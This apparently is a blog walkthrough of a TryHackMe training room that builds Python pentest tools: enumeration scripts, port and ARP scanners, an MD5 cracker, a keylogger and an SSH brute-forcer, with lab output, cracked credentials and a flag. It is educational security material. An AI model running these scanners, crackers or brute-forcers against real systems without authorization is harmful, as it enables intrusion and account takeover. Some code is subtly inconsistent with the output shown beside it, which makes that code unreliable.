LEARN >> Python For Pentesters

Table of Contents

This is where the fun begins!

This room is not intended to turn you into a Python master… as a penetration tester you do not need to become a full-fleged programmer, but having basic understanding and the ability to whip out a new tool or script to automate something is defintely a bonus!

Task 1 – Introduction

Python can be the most powerful tool in your arsenal as it can be used to build almost any of the other penetration testing tools.

As mentioned in the description above, this room does not intend to teach you everything you need to know about Python, but will give you pointers on which you can build and improve. The example "tools" we will be building in this room are only one way of writing code to get the intended result, they are not "the only" or necessarily "the correct" way of doing so either – the goal is to build quick and effective tools that will help in our daily tasks.

Throughout this room we will learn how to:

  • Use Python to enumerate the target’s subdomain
  • Build a simple keylogger
  • Scan the network to find target systems
  • Scan any target to find the open ports
  • Download files from the internet
  • Crack hashes

Any code you will find in this room can be compiled using simple tools such as PyInstaller and sent to the target system.



Task 2 – Subdomain Enumeration

One of the best features to a pentester using Python is it’s ability to automate tasks – any tasks that has to be performed regularly is worth automating, and Python makes that easy!

Finding subdomains used by the target organization is an effective way to increase the attack surface and discover more vulnerabilities.

The will use a list of potential subdomains (that we provide) and prepend them to the domain name provided, then try to connect to each subdomain via http – if it gets a connection back then it reports the subdomain as "valid".

NOTE: the person who created this room not only failed to attach the subdomains.txt list (and it’s not even on the AttackBox as promised), but there is also a lack of detail on the box in the room (as in the hostname)… so assuming that we had to use this script against the box in the room, I re-wrote the list from the screenshot of subdomains.txt, and then I had to add the IP to /etc/hosts and set it to target.thm. I got no results back, I even ran it against the wordlist2.txt, but when I ran it against tryhackme.com it did work. This could be due to the way vhosts are setup on the web server.

SOURCE >> sub_enum.py

#!/usr/bin/env python3
import requests 
import sys 

sub_list = open("subdomains.txt").read() 
subdoms = sub_list.splitlines()

for sub in subdoms:
    sub_domains = f"http://{sub}.{sys.argv[1]}" 

    try:
        requests.get(sub_domains)

    except requests.ConnectionError: 
        pass

    else:
        print("Valid domain: ",sub_domains)
Code Breakdown!

Unlike the previous room, this won’t break down EVERYTHING, just the new things that appear on the way… 🙂

NOTE: these breakdowns are additional to the room, you won’t find this in there! In saying that though, this is my understanding of the code, I don’t 100% guarantee it is correct!

  • Let’s break it down:
    • The very first line of this code is not actually Python code, nor is it a comment even though it begins with # (though it is according to Python luckily) – this is known as a "shebang". This points your shell to the correct program to run it with, and allows you to mark your Python code file via chmod with +x permissions, meaning instead of typing python3 sub_enum.py you can call it simply by typing ./sub_enum.py
    • sub_list is set as a pointer to the wordlist (make sure that file exists!), however the command also ends in .read() – this means it’s reading the contents of the file directly into the variable, rather than just being a pointer to the file that we would have to .read() elsewhere anyway… saving us a line of code!
    • subdoms is using .splitlines() to read each line into it’s own string in a list. This is how we load data for use in a for loop.
    • The string being set on sub_domains has an intentional f before the opening quotation mark – this is a relatively new (Python 3.6+) method of formatting strings called an f-string. Prepending the string with f you enable the new formatting method, that allows you to reference variables in a much cleaner way. This code is using {} brackets to signify what variable it wants in it’s place, but there are plenty of other methods, and things you can do in between those brackets…
    • the rest of the code is an extension on what we have learned so far in the way of for loops. This code uses try: / except: / else – basically turning each iteration of the loop into an if statement, but with a difference… This is because of the way that requests are handled – when you use requests.get() it doesn’t just return true or false as a standard if statement requires, if an error occurs requests stores that outcome as a "boolean" in a .ConnectionError – so as the code shows above, it will try: to request a connection to sub_domains, except if that request was a .ConnectionError we will pass this iteration of the loop (skip the rest of the for loop to the next loop), else: we print the successful connection in a message to the user, ensuring they know what sub_domain was successful. This method is good if there is only one situation, but we will touch on more later…



Task 3 – Directory Enumeration

As it is often pointed out, reconnaissance is one of the most critical steps to the success of a penetration engagement. Once subdomans have been discovered, the next step would be to find directories (or files).

SOURCE >> dir_enum.py

import requests 
import sys 

sub_list = open("wordlist2.txt").read() 
directories = sub_list.splitlines()

for dir in directories:
    dir_enum = f"http://{sys.argv[1]}/{dir}.html" 
    r = requests.get(dir_enum)
    if r.status_code==404: 
        pass
    else:
        print("Valid directory:" ,dir_enum)
Code Breakdown
  • OK let’s break it down!:
    • The code in this project compared to the last is very similar… the first important change is in dir_enum – instead of searching for subdomains we are "supposedly" searching for directories… however, notice the .html at the end of the URL? This is actually intentional for scanning the target box for this task, but if you want to turn this into a real directory scanner, switch out that .html for a /
    • The second change in this project is how the for loop is handled… because the request has been put into the variable r we can then use if / else to do our check… we are passing if r.status_code is equal to 404r.status_code holds the HTTP response code, 404 is "file not found". Using if / elif / … / else you could extend this loop to respond to multiple conditions for data returned from r… or anything else you dream!

Here is an example of how we could extend that loop:

for dir in directories:
    dir_enum = f"http://{sys.argv[1]}/{dir}.html"
    r = requests.get(dir_enum)
    if r.status_code==404:
        print("404 - NOT FOUND!:", dir_enum)
    elif r.status_code==403:
        print("403 - FORBIDDEN!:", dir_enum)
    elif r.status_code==302:
        print("302 - MOVED TEMP:", dir_enum)
    elif r.status_code==301:
        print("302 - MOVED PERM:", dir_enum)
    else:
        print(f"{r.status_code} -    IS OK?! >> {dir_enum}")

Scanning the target…

Ok so using this script against the target box in this room we get 4 hits:

❯ ./direnum.py 10.10.75.155
Valid directory: http://10.10.75.155/surfer.html
Valid directory: http://10.10.75.155/private.html
Valid directory: http://10.10.75.155/apollo.html
Valid directory: http://10.10.75.155/index.html
surfer.html

Titled "Notes for Matt", this page contains logins and passwords … to what I have no idea!

# Notes for Matt

## Passwords set are:

-   Password for Madhatter set to MyCupOfTea
-   Password for Rabbit set to LOUSYRABBO
-   Password for Alice set to OnWithTheirHeads

## Users created are:

-   tiffany
-   daniel
-   jim
-   mike
private.html

This is your run-of-the-mill login form… none of the credentials under "Passwords" above are valid…

apollo.html

A short crpyto string… MD5 actually, reads rainbow.

cd13b6a6af66fb774faa589a9d18f906






Task 4 – Network Scanner

Python could easily be used to build a simple ICMP (Internet Control Message Protocol) scanner to "ping"a host to see if it is online, but the problem with that is ICMP is either disabled, blocked or set to not respond on most systems / firewalls these days. If we are scanning a local network, it is much more effective to use ARP (Address Resolution Protocol) to identify other targets on the network.

SOURCE >> arp_scan.py

from scapy.all import *

interface = "eth0"
ip_range = "10.10.X.X/24"
broadcastMac = "ff:ff:ff:ff:ff:ff"

packet = Ether(dst=broadcastMac)/ARP(pdst = ip_range) 

ans, unans = srp(packet, timeout =2, iface=interface, inter=0.1)

for send,receive in ans:
        print (receive.sprintf(r"%Ether.src% - %ARP.psrc%"))     
Code Breakdown
  • Let’s break it down! :
    • For usage sake, you need to update interface and ip_range to suit your network… e.g. interface= "eth0" and ip_range = "192.168.68.0/24" – you can leave broadcastMac alone…
    • packet is holding the destination packet details – it basically equates to Ethernet pack to broadcastMac, type of packet is ARP going to ip_range
    • ans, unans seems to be setting two different variables depending on the outcome… ans is for packets that get an answer, unans is for failures. It calls srp() from scapy that seems to send the ARP packet we declared previously, with a timeout of 2, to the interface we entered above, the inter switch I don’t quite know at this point…
    • The for loop looks for any that match send or receive in ans and prints the results.
    • The print() function forks off to a special output from scapy called sprintf() that can properly format the data received… in this case it prints the MAC address with %Ether.src% and the IP with %ARP.psrc% (both seemingly referencing the source address that it received a response packet from).




Task 5 – Port Scanner

And now for one of the most popular enumeration methods – a port scanner!

SOURCE >> port_scanner.py

import sys
import socket
import pyfiglet

ascii_banner = pyfiglet.figlet_format("TryHackMe \n Python 4 Pentesters \nPort Scanner")
print(ascii_banner)

ip = '192.168.1.6' 

open_ports =[] 
ports = range(1, 65535)

def probe_port(ip, port, result = 1): 
  try: 
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 
    sock.settimeout(0.5) 
    r = sock.connect_ex((ip, port))   
    if r == 0: 
      result = r 
    sock.close() 
  except Exception as e: 
    pass 
  return result

for port in ports: 
    sys.stdout.flush() 
    response = probe_port(ip, port) 
    if response == 0: 
        open_ports.append(port) 

if open_ports: 
  print ("Open Ports are: ") 
  print (sorted(open_ports)) 
else: 
  print ("Looks like no ports are open :(")
Code Breakdown
  • Breakdown time!:
    • This time we are using socket, making TCP connections to test if the ports are accepting connections. Ignore that pyfiglet import… it’s responsible for that massive ugly banner!
    • Now is probably as good a time as any to mention that you don’t actually need to declare imports one per line – you could shorten the top 3 lines to import sys,socket,pyfiglet
    • The ip variable needs to be modified to change the target ip… eww!
    • open_ports =[] starts an empty list inside the open_ports variable, this is where the script will store the open ports for output at the end.
    • ports sets the range() from 1 to 65535 – to scan all ports
    • The probe_port function checks a given ip and port and returns whether it was open (0) or closed (1)… also notice the at the end of the def, result = 1. Thats not a required value, it is setting the value of result to 1 before the loop begins (which is a fail)… let’s dive a bit deeper though:
    • The try: block sets up a socket using sock(), sets a timeout on that socket for 0.5 seconds then sets r to point to the sock.connect_ex() which connects to the port it is scanning on the IP set above.
      • If r == 0 (meaning it got a connection to the port) it sets the result variable to 0 as well (what the function returns). The socket is closed with sock.close() either way.
    • The except block is called if Exception (as e – not relevant) is true, this means something went wrong with the connection, so it simply passes to the end of the function.
    • Finally, the function returns it’s result.
    • The for loop is pretty easy to understand – it loops through each port and simply sets response to the result of probe_port on the current port… if it equals 0 it appends the port to the open_ports list.
    • The final if statement simply either prints the list of open ports, or that it didn’t find anything.

BONUS >> port_skam.py

I couldn’t help but overhaul this one a little…

#!/usr/bin/env python3
import sys,socket,pyfiglet

ascii_banner = pyfiglet.figlet_format("portSKAM")
print(ascii_banner)

if len(sys.argv) > 1:
    ip = sys.argv[1]
else:
    print(f"      USAGE >> {sys.argv[0]} <IP-ADDRESS>")
    print("")
    sys.exit()

ports = range(1, 65535)
c = 0

def probe_port(ip, port, result = 1):
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(0.5)
        r = sock.connect_ex((ip, port))
        if r == 0:
            result = r
            print(str(port) + " / ", end="", flush=True)
        sock.close()
    except Exception as e:
        pass
    return result

print(f"     TARGET >> {ip}")
print(" PORTS OPEN >> ", end="", flush=True)

for port in ports:
    sys.stdout.flush()
    response = probe_port(ip, port)
    if response == 0:
        c = c + 1

print(f"** {c} PORTS FOUND OPEN **")
Quick Bonus Breakdown
  • Let’s look at the main differences:
    • I ditched that super long banner for a simple "portSKAM" … looks better. 😉
    • Instead of hard-coding an IP, we want a script that we can choose the IP at runtime – the if statement checks the length of the command line, if it is larger than 1 it grabs the IP from the command line arguments, if not, it prints a quick usage and quits.
    • Directly under the ports range, we set c = 0 – this is our open port count.
    • An eagle-eye would have noticed an extra print() in the probe_port function… this prints the found port on the screen, but the key additions are , end="", flush=True – this means when it prints the current port (with a leading " / ") it doesn’t end the line with a new line (end="") and the flush=True ensures Python prints that text immediately… this is by default so if you want to build up a text line before printing it to output you can, but the way this is used it will keep printing to the same line and show what it is adding as it goes…. the intended effect is that as soon as it finds a port, it prints it directly to screen and you don’t have to wait until the end to find out what is open.
    • The second printf() line above the for loop is actually the start of the line where it will print ports… or not!
    • The for loop is almost identical to the previous version, except we replace append of ports to open_ports (which is gone from this version), we increase our count c by 1.
    • The last line, instead of the previous if statement will simply print how many ports open it found, and it will end up at the end of the PORTS OPEN >> line… if no ports are found then all the user will see is ** 0 PORTS FOUND OPEN **, or additionaly that 0 will include how many it did find open.
Example Bonus Output
❯ ./port_scanner.py 192.168.68.121
                  _   ____  _  __    _    __  __
 _ __   ___  _ __| |_/ ___|| |/ /   / \  |  \/  |
| '_ \ / _ \| '__| __\___ \| ' /   / _ \ | |\/| |
| |_) | (_) | |  | |_ ___) | . \  / ___ \| |  | |
| .__/ \___/|_|   \__|____/|_|\_\/_/   \_\_|  |_|
|_|

     TARGET >> 192.168.68.121
 PORTS OPEN >> 1716 / 8088 / 43339 / 54102 / 55572 / 59914 / 60490 / ** 7 PORTS FOUND OPEN **






Task 6 – File Downloader

On Linux, we have wget or curl – on Windows, we have certutil or a range of PowerShell methods…

Python can download files too! 🙂

SOURCE >> web_dl.py

import requests

url = 'https://assets.tryhackme.com/img/THMlogo.png'
r = requests.get(url, allow_redirects=True)
open('THMlogo.png', 'wb').write(r.content)

The code above uses the requests library to download url via requests.get() and uses open() to write the file to disk.

  • You could shorten this to one line like this:
python -c 'import requests; r = requests.get("<URL>"); open("<OUT_FILE>", "wb").write(r.content)'

(replace <URL> with url to file, <OUT_FILE> to the filename to save to)

BONUS >> webdl.py

… or we could extend it to make it universal!

import sys
import requests,fnmatch

if len(sys.argv) > 2:
    url = sys.argv[1]
    outfile = sys.argv[2]
else:
    print(f"[-] USAGE >> {sys.argv[0]} <URL> <OUT-FILE>")
    print("")
    sys.exit()

print(f"Downloading: {url}")

r = requests.get(url, allow_redirects=True)
open(outfile, 'wb').write(r.content)

if r.status_code==404:
    print("404 - NOT FOUND! >> ", url)
elif r.status_code==403:
    print("403 - FORBIDDEN! >> ", url)
elif fnmatch.filter(str(r.status_code), '5??'):
    print("{r.status.code} - SERVER ERROR! >> ", url)
else:
    print(f"DONWLOAD COMPLETE - saved as: {outfile}")

There is no real need for a breakdown on this one… this has all been explained before!



NOTE: although there was links to PsExec included in this task (as it was used as an example to download), I tried to google "Unified Cyber Kill Chain" to try to find the correct answer for this… turns out this is not actually one of the "default" steps… take that for whatever you wish.


Task 7 – Hash Cracker

A hash is often used to safeguard passwords and other important data. As a penetration test, you may need to find the cleartext value for several different hashes. The hashlib library in Python allows you to build hash crackers according to your requirements quickly.

hashlib is a powerful module that supports a wide range of algorithms:

Ignoring some of the more "exotic" ones you will see in the list above, hashlib will support most of the commonly used hashing algorithms.

SOURCE >> hash_cracker.py

import hashlib
import pyfiglet

ascii_banner = pyfiglet.figlet_format("TryHackMe \n Python 4 Pentesters \n HASH CRACKER for MD 5")
print(ascii_banner)

wordlist_location = str(input('Enter wordlist file location: '))
hash_input = str(input('Enter hash to be cracked: '))

with open(wordlist_location, 'r') as file:
    for line in file.readlines():
        hash_ob = hashlib.md5(line.strip().encode())
        hashed_pass = hash_ob.hexdigest()
        if hashed_pass == hash_input:
            print('Found cleartext password! ' + line.strip())
            exit(0)
Code Breakdown
  • Let’s take a look at this…
    • input() is used to take input from the user to give the hash and wordlist
    • hash_ob is used to store the md5 encrypted line using hashlib.md5()
    • hashed_pass is set to the encoded data in hexadecimal format
    • … the rest is pretty straight forward.

BONUS >> craxMD5.py

import sys
import hashlib
import pyfiglet

ascii_banner = pyfiglet.figlet_format("craxMD5")
print(ascii_banner)

if len(sys.argv) > 2:
    wordlist = sys.argv[1]
    pw_hash = sys.argv[2]
else:
    print(f"[-] USAGE >> {sys.argv[0]} <WORDLIST> <HASH>")
    print("")
    sys.exit()

print(f"WORDLIST >> {wordlist}")
print(f"    HASH >> {pw_hash}")

with open(wordlist, 'r') as file:
    for line in file.readlines():
        print('CHECKING >> ', line.strip(), end='\x1b[1K\r')
        hash_ob = hashlib.md5(line.strip().encode())
        hashed_pass = hash_ob.hexdigest()
        if hashed_pass == pw_hash:
            print('   FOUND >> ' + line.strip())
            exit(0)
print('  FAILED >> no matches found!')




Task 8 – Keyloggers

Here is the source to the world’s simpilest keylogger:

import keyboard
keys = keyboard.record(until ='ENTER')
keyboard.play(keys)

This will record all keypresses until the user hits Enter – then it plays back everything it recorded.

If you don’t have the keyboard module, install with pip3 install keyboard.




Task 9 – SSH Brute Forcing

Python is a powerful language with a plethora of modules available that further enhance it’s capabilities. Paramiko is an SSHv2 implementation that will be useful in building SSH clients and servers.

The example below shows one way to build an SSH password brute force attack script. As with everything in the programming world, there is rarely a "correct" way of doing something, and being that as a penetration tester we are not aiming to become programming masters, our aim is to simply create programs that do what we need for the current task.

SOURCE >> ssh_bf.py

import paramiko
import sys
import os

target = str(input('Please enter target IP address: '))
username = str(input('Please enter username to bruteforce: '))
password_file = str(input('Please enter location of the password file: '))

def ssh_connect(password, code=0):
    ssh = paramiko.SSHClient()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())

    try:
        ssh.connect(target, port=22, username=username, password=password)
    except paramiko.AuthenticationException:
        code = 1
    ssh.close()
    return code

with open(password_file, 'r') as file:
    for line in file.readlines():
        password = line.strip()

        try:
            response = ssh_connect(password)

            if response == 0:
                 print('password found: '+ password)
                 exit(0)
            elif response == 1: 
                print('no luck')
        except Exception as e:
            print(e)
        pass

input_file.close()
Code Breakdown
  • Not much to say on this one, note the ssh_connect function for a basic usage of paramiko – in particular, the ssh.ssh_missing_host_keyPolicy(paramiko.AutoAddPolicy()) line – this simply tells paramiko that if the target is new and we haven’t accepted it’s certificate yet, to automatically accept it. The rest is pretty self-explanatory…

Questions answered

❯ python3 ssh_bf.py 10.10.218.201 tiffany wordlist2.txt
 _                _       ____ ____  _   _
| |__  _ __ _   _| |_ ___/ ___/ ___|| | | |
| '_ \| '__| | | | __/ _ \___ \___ \| |_| |
| |_) | |  | |_| | ||  __/___) |__) |  _  |
|_.__/|_|   \__,_|\__\___|____/____/|_| |_|

  WORDLIST >> wordlist2.txt
 TARGET IP >> 10.10.218.201
      USER >> tiffany
FOUND PASS >> trustno1
❯ ssh tiffany@10.10.39.148
The authenticity of host '10.10.39.148 (10.10.39.148)' can't be established.
ED25519 key fingerprint is SHA256:FJZNNeeh64wHhjKrH/aNyKxKS5B2gm0t+kK5EcXBpiM.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.39.148' (ED25519) to the list of known hosts.
tiffany@10.10.39.148's password:
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 5.4.0-1029-aws x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue Nov 30 08:15:53 UTC 2021

  System load:  0.0               Processes:           94
  Usage of /:   4.8% of 29.02GB   Users logged in:     0
  Memory usage: 18%               IP address for eth0: 10.10.39.148
  Swap usage:   0%

129 packages can be updated.
78 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Mon Jun 28 13:00:46 2021 from 10.9.2.216
$ cat flag.txt
THM-737390028



Leave a Reply

Your email address will not be published. Required fields are marked *